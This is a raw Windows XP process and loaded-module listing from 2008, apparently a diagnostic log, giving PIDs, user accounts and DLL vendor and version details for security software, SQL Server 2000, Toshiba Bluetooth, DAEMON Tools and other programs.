[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\SSOMngr.dll] [Cognizance Corporation, 2.25.0.296]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ASBioAT.dll] [Cognizance Corporation, 2.5.0.083]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItEncryptedDisk.dll] [Cognizance Corporation, 1.5.0.054]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItEncrypt.dll] [Cognizance Corporation, 1.01.037]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ittal.dll] [Cognizance Corporation, 2.5.0.208]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\AuthWiz.dll] [Cognizance Corporation, 2.5.0.558]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\AuthWiz.dll] [Cognizance Corporation, 2.5.0.538]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItDAC.dll] [Cognizance Corporation, 1.00.317]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[C:\WINDOWS\system32\ATSC70.dll] [AuthenTec, Inc., 7, 8, 1, 14]
[PID: 584 / SYSTEM][C:\WINDOWS\system32\nvsvc32.exe] [NVIDIA Corporation, 6.14.11.5680]
[C:\WINDOWS\system32\nvapi.dll] [NVIDIA Corporation, 6.14.11.5680]
[PID: 1684 / SYSTEM][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[PID: 2148 / SYSTEM][C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtSrv.exe] [TOSHIBA CORPORATION, 1, 0, 1402, 0]
[PID: 2448 / SYSTEM][C:\Program Files\Microsoft SQL Server\MSSQL\binn\sqlagent.exe] [Microsoft Corporation, 2000.080.2273.00 Hotfix 2259]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\SQLRESLD.dll] [Microsoft Corporation, 2000.080.2039.00]
[C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\SQLSVC.dll] [Microsoft Corporation, 2000.080.2039.00]
[C:\WINDOWS\system32\odbcbcp.dll] [Microsoft Corporation, 2000.085.1132.00 (xpsp.080413-0852)]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\W95SCM.dll] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\SEMMAP.dll] [Microsoft Corporation, 2000.080.2273.00 Hotfix 2259]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\Resources\2052\SQLSVC.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\Resources\2052\SEMMAP.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\Resources\2052\sqlagent.RLL] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\SQLAGENT.DLL] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\BINN\SQLCMDSS.DLL] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\BINN\Resources\2052\SQLCMDSS.RLL] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\BINN\SQLREPSS.DLL] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\BINN\Resources\2052\SQLREPSS.RLL] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\BINN\SQLATXSS.DLL] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\ATXCORE.dll] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\binn\Resources\2052\ATXCORE.RLL] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\MSSQL\BINN\Resources\2052\SQLATXSS.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\Program Files\Microsoft SQL Server\80\Tools\BINN\AXSCPHST.DLL] [Microsoft Corporation, 2000.080.2039.00]
[C:\Program Files\Microsoft SQL Server\80\Tools\BINN\Resources\2052\AXSCPHST.RLL] [Microsoft Corporation, 2000.080.0194.00]
[C:\WINDOWS\system32\SQLSRV32.dll] [Microsoft Corporation, 2000.085.1132.00 (xpsp.080413-0852)]
[C:\WINDOWS\system32\sqlsrv32.rll] [Microsoft Corporation, 2000.085.1117.00 built by: (_sqlbld)]
[C:\WINDOWS\system32\DBmsLPCn.dll] [Microsoft Corporation, 2000.080.2039.00]
1234567i - 2008-9-2 22:09:00
[PID: 2852 / LOCAL SERVICE][C:\WINDOWS\System32\SCardSvr.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2113)]
[PID: 2936 / Administrator][C:\WINDOWS\ATK0100\HControl.exe] [, 1043, 2, 15, 65]
[C:\WINDOWS\ATK0100\CMSSC.dll] [N/A, ]
[C:\WINDOWS\ATK0100\inter_f2.dll] [ATK, 1043, 2, 15, 52]
[C:\WINDOWS\ATK0100\ATKWLIOC.DLL] [ACTIONTEC Electronics,Inc, 2.01.02]
[C:\WINDOWS\ATK0100\SiSPkt.dll] [Silicon Integrated Systems Corp., 1, 0, 0, 45]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[C:\WINDOWS\system32\SynCOM.dll] [Synaptics, Inc., 8.3.5 25May06]
[PID: 3060 / Administrator][C:\Program Files\Rising\Rav\RavTask.exe] [Beijing Rising Information Technology Co., Ltd., 20.0.0.24]
[C:\Program Files\Rising\Rav\ProcCom.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rav\RsCommX2.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rav\RSCOMMON.DLL] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[C:\Program Files\Rising\Rav\RSAPPMGR.DLL] [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
[C:\Program Files\Rising\Rav\CfgDll.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
[PID: 3352 / Administrator][C:\Program Files\Synaptics\SynTP\SynTPEnh.exe] [Synaptics, Inc., 8.3.5 25May06]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\WINDOWS\system32\SynCOM.dll] [Synaptics, Inc., 8.3.5 25May06]
[C:\WINDOWS\system32\SynTPAPI.dll] [Synaptics, Inc., 8.3.5 25May06]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[PID: 3616 / Administrator][C:\WINDOWS\ATK0100\ATKOSD.exe] [, 1043, 2, 15, 63]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[PID: 3636 / SYSTEM][C:\WINDOWS\System32\svchost.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[PID: 3840 / Administrator][C:\Program Files\Wireless Console 2\wcourier.exe] [, 2, 0, 10, 0]
[C:\Program Files\Wireless Console 2\MSVCR80.dll] [Microsoft Corporation, 8.00.50727.762]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[PID: 3984 / Administrator][C:\WINDOWS\system32\ctfmon.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2105)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[PID: 4000 / Administrator][C:\Program Files\DAEMON Tools Lite\daemon.exe] [DT Soft Ltd, 4.12.2.0]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\Program Files\DAEMON Tools Lite\DaemonPlugin.dll] [DT Soft Ltd, 4.12.0.0]
[C:\Program Files\DAEMON Tools Lite\daemon.dll] [DT Soft Ltd., 4.12.0.0]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\SFSShell.dll] [Cognizance Corporation, 1.22.0.239]
[C:\WINDOWS\system32\MSVCR70.dll] [Microsoft Corporation, 7.00.9955.0]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItMsg.dll] [Cognizance Corporation, 1.21.0.410]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\SFSShell.dll] [Cognizance Corporation, 1.22.0.240]
[C:\Program Files\DAEMON Tools Lite\Lang\CHS.dll] [N/A, ]
[C:\Program Files\DAEMON Tools Lite\Lang\ENU.dll] [N/A, ]
[C:\Program Files\DAEMON Tools Lite\Plugins\Images\bw5mount.dll] [, 1.1.3.0]
[C:\Program Files\DAEMON Tools Lite\Plugins\Images\bwtmount.dll] [DT Soft Ltd., 1.01.0.0]
[C:\Program Files\DAEMON Tools Lite\Plugins\Images\ccdmount.dll] [DT Soft Ltd., 1.10.0.0]
[C:\Program Files\DAEMON Tools Lite\Plugins\Images\cuemount.dll] [DT Soft Ltd., 1.02.0.0]
[C:\Program Files\DAEMON Tools Lite\Plugins\Images\iszmount.dll] [DT Soft Ltd., 1.03.0.0]
[C:\Program Files\DAEMON Tools Lite\Plugins\Images\nrgmount.dll] [DT Soft Ltd., 1.12.0.0]
[C:\Program Files\DAEMON Tools Lite\Plugins\Images\pdimount.dll] [DT Soft Ltd., 1.01.0.0]
[C:\Program Files\DAEMON Tools Lite\Plugins\Images\pfcmount.dll] [DT Soft Ltd., 1.00.0.0]
[C:\Program Files\DAEMON Tools Lite\pfctoc.dll] [Padus(R), Inc., 1, 0, 0, 12]
[PID: 4020 / Administrator][C:\Program Files\Microsoft ActiveSync\wcescomm.exe] [Microsoft Corporation, 4.5.5096.0]
[C:\WINDOWS\system32\CEUTIL.dll] [Microsoft Corporation, 4.5.5096.0]
[C:\WINDOWS\system32\RAPI.dll] [Microsoft Corporation, 4.5.5096.0]
[C:\Program Files\Microsoft ActiveSync\TCP2UDP.dll] [Microsoft Corporation, 4.5.5096.0]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\Microsoft ActiveSync\rapiproxystub.dll] [Microsoft Corporation, 4.5.5096.0]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\Program Files\Microsoft ActiveSync\dtptdns.dll] [Microsoft Corporation, 4.5.5096.0]
[PID: 828 / Administrator][C:\PROGRA~1\MICROS~3\rapimgr.exe] [Microsoft Corporation, 4.5.5096.0]
[C:\WINDOWS\system32\CEUTIL.dll] [Microsoft Corporation, 4.5.5096.0]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\Program Files\Microsoft ActiveSync\rapiproxystub.dll] [Microsoft Corporation, 4.5.5096.0]
[PID: 164 / Administrator][C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtMng.exe] [TOSHIBA CORPORATION., 5.00.7802.ALL]
[C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosCpsAPI.dll] [TOSHIBA CORPORATION., 3.01.5520.0]
[C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtMngHelp.dll] [TOSHIBA CORPORATION., 5.00.6z01.ALL]
[C:\WINDOWS\system32\TosAvAPI.dll] [TOSHIBA CORPORATION., 5.00.6804.0]
[C:\WINDOWS\system32\TosBtSDDB.dll] [TOSHIBA CORPORATION., 5.00.7515.0]
[C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtMngLang.dll] [TOSHIBA CORPORATION., 5.00.6920.0]
[C:\WINDOWS\system32\TosBdAPI.dll] [TOSHIBA CORPORATION., 4, 1, 1612, 0]
[C:\WINDOWS\system32\TosCommAPI.dll] [N/A, ]
[C:\WINDOWS\system32\TosLaneAPI.dll] [TOSHIBA CORPORATION., 1, 0, 3, 0]
[C:\WINDOWS\system32\TosBtAPI.dll] [TOSHIBA CORPORATION., 5.00.7615.0]
[C:\WINDOWS\system32\LCWizard.dll] [TOSHIBA CORPORATION, 5.0.0.ALL]
[C:\Program Files\Toshiba\Bluetooth Toshiba Stack\BtUsrMod.dll] [TOSHIBA CORPORATION, 1, 01, 11, US]
[C:\WINDOWS\system32\TosHidAPI.dll] [TOSHIBA CORPORATION., 4, 0, 1108, 0]
[C:\WINDOWS\system32\TosGnsAPI.dll] [TOSHIBA CORPORATION., 5, 0, 0, 0]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\TosAcpiAPI.dll] [TOSHIBA CORPORATION., 1, 0, 3, 0]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtLoad.dll] [TOSHIBA CORPORATION, 5, 10, 0, 0]
[PID: 2884 / Administrator][C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosA2dp.exe] [TOSHIBA CORPORATION., 5.00.7227.ALL]
[C:\WINDOWS\system32\TosBtECCAPI.dll] [TOSHIBA CORPORATION., 3.00.6510.0]
[C:\WINDOWS\system32\TosBtAPI.dll] [TOSHIBA CORPORATION., 5.00.7615.0]
[C:\WINDOWS\system32\TosBdAPI.dll] [TOSHIBA CORPORATION., 4, 1, 1612, 0]
[C:\WINDOWS\system32\TosAvdtAPI.dll] [TOSHIBA CORPORATION., 5.00.7410.0]
[C:\WINDOWS\system32\TosSndAPI.dll] [TOSHIBA CORPORATION., 5.00.7117.0]
[C:\WINDOWS\system32\TosSndPlug.dll] [TOSHIBA CORPORATION., 5.00.7529.ALL]
1234567i - 2008-9-2 22:10:00
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[PID: 2916 / Administrator][C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtHid.exe] [TOSHIBA CORPORATION., 4, 1, 1323, 0]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[PID: 3160 / Administrator][C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtHsp.exe] [TOSHIBA CORPORATION., 5.10.05.70426]
[C:\WINDOWS\system32\TosBtECCAPI.dll] [TOSHIBA CORPORATION., 3.00.6510.0]
[C:\WINDOWS\system32\TosBtAPI.dll] [TOSHIBA CORPORATION., 5.00.7615.0]
[C:\WINDOWS\system32\TosBdAPI.dll] [TOSHIBA CORPORATION., 4, 1, 1612, 0]
[C:\WINDOWS\system32\LCWizard.dll] [TOSHIBA CORPORATION, 5.0.0.ALL]
[C:\WINDOWS\system32\TosSndAPI.dll] [TOSHIBA CORPORATION., 5.00.7117.0]
[C:\WINDOWS\system32\TosSndPlug.dll] [TOSHIBA CORPORATION., 5.00.7529.ALL]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[PID: 816 / SYSTEM][C:\PROGRAM FILES\RISING\RAV\ravmond.exe] [Beijing Rising Information Technology Co., Ltd., 20.0.0.80]
[C:\PROGRAM FILES\RISING\RAV\BWList.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.5]
[C:\WINDOWS\system32\MFC71.DLL] [Microsoft Corporation, 7.10.3077.0]
[C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
[C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
[C:\PROGRAM FILES\RISING\RAV\RSAPPMGR.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
[C:\PROGRAM FILES\RISING\RAV\CfgDll.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
[C:\PROGRAM FILES\RISING\RAV\RsLog.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.36]
[C:\PROGRAM FILES\RISING\RAV\ProcCom.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\PROGRAM FILES\RISING\RAV\RsCommX2.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\PROGRAM FILES\RISING\RAV\MonRule.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.29]
[C:\PROGRAM FILES\RISING\RAV\Hooksys.dll] [Beijing Rising Information Technology Co., Ltd., 22, 0, 0, 12]
[C:\PROGRAM FILES\RISING\RAV\HookReg.dll] [Beijing Rising Information Technology Co., Ltd., 22, 0, 0, 6]
[C:\PROGRAM FILES\RISING\RAV\HookNtos.dll] [Beijing Rising Information Technology Co., Ltd., 22, 0, 0, 5]
[C:\PROGRAM FILES\RISING\RAV\rswalmon.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 24]
[C:\PROGRAM FILES\RISING\RAV\recomp.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 41]
[C:\PROGRAM FILES\RISING\RAV\refs.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 18]
[C:\PROGRAM FILES\RISING\RAV\ffr.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 16]
[C:\Program Files\Rising\Rav\RsStore.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.9]
[C:\PROGRAM FILES\RISING\RAV\HookCont.dll] [Beijing Rising Information Technology Co., Ltd., 22, 0, 0, 3]
[C:\Program Files\Rising\Rav\fakescan.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.14]
[C:\Program Files\Rising\Rav\Scanner.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.39]
[C:\PROGRAM FILES\RISING\RAV\viruslib.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 27]
[C:\PROGRAM FILES\RISING\RAV\relibldr.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[C:\PROGRAM FILES\RISING\RAV\HookWeb.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.3]
[C:\PROGRAM FILES\RISING\RAV\nvfile.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 7]
[C:\PROGRAM FILES\RISING\RAV\scanexec.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 22]
[C:\PROGRAM FILES\RISING\RAV\unexe.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 6]
[C:\PROGRAM FILES\RISING\RAV\scanex.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 90]
[C:\PROGRAM FILES\RISING\RAV\pearc.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 8]
[C:\PROGRAM FILES\RISING\RAV\scanpack.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 10]
[C:\PROGRAM FILES\RISING\RAV\revm.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 11]
[C:\PROGRAM FILES\RISING\RAV\urutils.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 7]
[C:\PROGRAM FILES\RISING\RAV\ur000.dat] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\PROGRAM FILES\RISING\RAV\extfile.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 32]
[C:\PROGRAM FILES\RISING\RAV\scansct.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 11]
[C:\PROGRAM FILES\RISING\RAV\extole.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 13]
[C:\PROGRAM FILES\RISING\RAV\posttrt.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 24]
[C:\PROGRAM FILES\RISING\RAV\scriptci.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 4]
[C:\PROGRAM FILES\RISING\RAV\ur001.dat] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 4]
[C:\PROGRAM FILES\RISING\RAV\ur023.dat] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 3]
[C:\PROGRAM FILES\RISING\RAV\uroutine.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 27]
[C:\PROGRAM FILES\RISING\RAV\extmail.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 10]
[PID: 3624 / SYSTEM][C:\PROGRAM FILES\RISING\RAV\RavStub.exe] [Beijing Rising Information Technology Co., Ltd., 20.0.0.10]
[C:\PROGRAM FILES\RISING\RAV\ProcCom.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\PROGRAM FILES\RISING\RAV\RsCommX2.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\PROGRAM FILES\RISING\RAV\RSCOMMON.DLL] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[PID: 496 / Administrator][C:\Program Files\Rising\Rav\RAVMON.EXE] [Beijing Rising Information Technology Co., Ltd., 20.0.01.27]
[C:\WINDOWS\system32\MFC71.DLL] [Microsoft Corporation, 7.10.3077.0]
[C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
[C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
[C:\Program Files\Rising\Rav\ProcCom.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rav\RsCommX2.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rav\RSCOMMON.DLL] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[C:\Program Files\Rising\Rav\recomp.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 41]
[C:\Program Files\Rising\Rav\refs.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 18]
[C:\Program Files\Rising\Rav\viruslib.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 27]
[C:\Program Files\Rising\Rav\relibldr.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[C:\Program Files\Rising\Rav\RSAPPMGR.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
[C:\Program Files\Rising\Rav\CfgDll.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
[C:\Program Files\Rising\Rav\MonRule.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.29]
[C:\Program Files\Rising\Rav\PngDll.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 5]
[C:\Program Files\Rising\Rav\Rsguilib.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 90]
[C:\Program Files\Rising\Rav\RsXML.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 2]
[PID: 2268 / Administrator][C:\Documents and Settings\Administrator\桌面\Procexp.exe] [Sysinternals, 10.20]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\SFSShell.dll] [Cognizance Corporation, 1.22.0.239]
[C:\WINDOWS\system32\MSVCR70.dll] [Microsoft Corporation, 7.00.9955.0]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItMsg.dll] [Cognizance Corporation, 1.21.0.410]
[C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\SFSShell.dll] [Cognizance Corporation, 1.22.0.240]
[PID: 2504 / Administrator][C:\WINDOWS\system32\conime.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2105)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[PID: 2816 / Administrator][D:\Program Files\应用\同花顺核新2008\zdsj.exe] [杭州核新软件技术有限公司, 2008, 7, 1, 0]
[C:\WINDOWS\system32\Normaliz.dll] [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
[C:\WINDOWS\system32\iertutil.dll] [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[D:\Program Files\应用\同花顺核新2008\RICHED20.dll] [Microsoft Corporation, 5.30.23.1205]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[PID: 3992 / Administrator][C:\WINDOWS\system32\notepad.exe] [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2105)]
[C:\Program Files\Rising\Rfw\ijt_base.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
[C:\Program Files\Rising\Rfw\olemon.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\360safe\safemon\safemon.dll] [360.CN, 4, 2, 0, 1005]
[C:\WINDOWS\system32\APSHook.dll] [Cognizance Corporation, 2.0.0.015]
[PID: 3912 / Administrator][C:\Program Files\Rising\Rfw\RfwCfg.exe] [Beijing Rising Information Technology Co., Ltd., 7.0.2.62]
[C:\WINDOWS\system32\MFC71.DLL] [Microsoft Corporation, 7.10.3077.0]
[C:\WINDOWS\system32\MSVCR71.dll] [Microsoft Corporation, 7.10.3052.4]
[C:\WINDOWS\system32\MSVCP71.dll] [Microsoft Corporation, 7.10.3077.0]
[C:\Program Files\Rising\Rfw\RsGuiLib.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 90]
[C:\Program Files\Rising\Rfw\ProcCom.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rfw\RsCommX2.dll] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
[C:\Program Files\Rising\Rfw\RSAPPMGR.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
[C:\Program Files\Rising\Rfw\CfgDll.dll] [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
[C:\Program Files\Rising\Rfw\RSCOMMON.DLL] [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[C:\Program Files\Rising\Rfw\RfwCtrl.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
[C:\Program Files\Rising\Rfw\ProxyCtr.dll] [Beijing Rising Information Technology Co., Ltd., 7.0.0.3]
